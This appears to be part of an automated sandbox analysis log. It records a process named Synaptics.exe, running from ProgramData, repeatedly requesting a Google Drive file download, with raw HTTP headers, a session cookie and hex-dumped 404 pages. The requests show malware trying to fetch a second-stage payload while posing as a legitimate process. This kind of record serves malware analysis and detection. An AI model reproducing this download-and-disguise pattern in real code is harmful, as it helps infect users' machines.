                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3PNiUUe4QZEUG1OWAadauQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:13 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:13 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 69 41 73 43 2d 45 7a 6e 5a 6b 76 47 6d 50 67 6d 45 61 41 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="tiAsC-EznZkvGmPgmEaAXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:13 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              66192.168.2.449835142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:14 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-f78HeLAwfwGR1uTu5AV0Vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              67192.168.2.449836142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:14 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5O3u_8ZOdKp7x1nJXtdfMiplaXFWiJxdpvSzn4neZy0S7znnRZctRxIrlsJE0sTf8K
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:14 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QEzb38PhDBxuJuVM6hSlbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:14 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:14 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 50 2d 45 69 4a 69 70 32 6e 6d 7a 6e 2d 69 5a 78 51 6f 31 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="FP-EiJip2nmzn-iZxQo1vQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:14 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              68192.168.2.449837142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:14 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-uvUouGE20KC0T9cfVtF5RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              69192.168.2.449840142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:14 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4GpLwAMwHZLPgIdypb8KqqYpT2OACRHVqncowk_N-eAbtfZVBV_e5Eajxg4LzhRDgfq6NZXXU
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:14 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HxC65DDnAqJQI2FntX3LfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:14 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:14 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 53 51 31 4c 69 58 56 31 54 4f 32 6c 6d 49 6d 4a 79 65 46 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="SSQ1LiXV1TO2lmImJyeF4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:14 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              70192.168.2.449843142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:14 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              71192.168.2.449842142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              72192.168.2.449846142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:16 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-iQHpnK8AhxGRWLfas85gBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              73192.168.2.449847142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:16 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:16 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DjuCIVLw64X1CPLg1W70mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              74192.168.2.449851142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:17 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--Th4JYBz_mkA-5GPtQSsmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
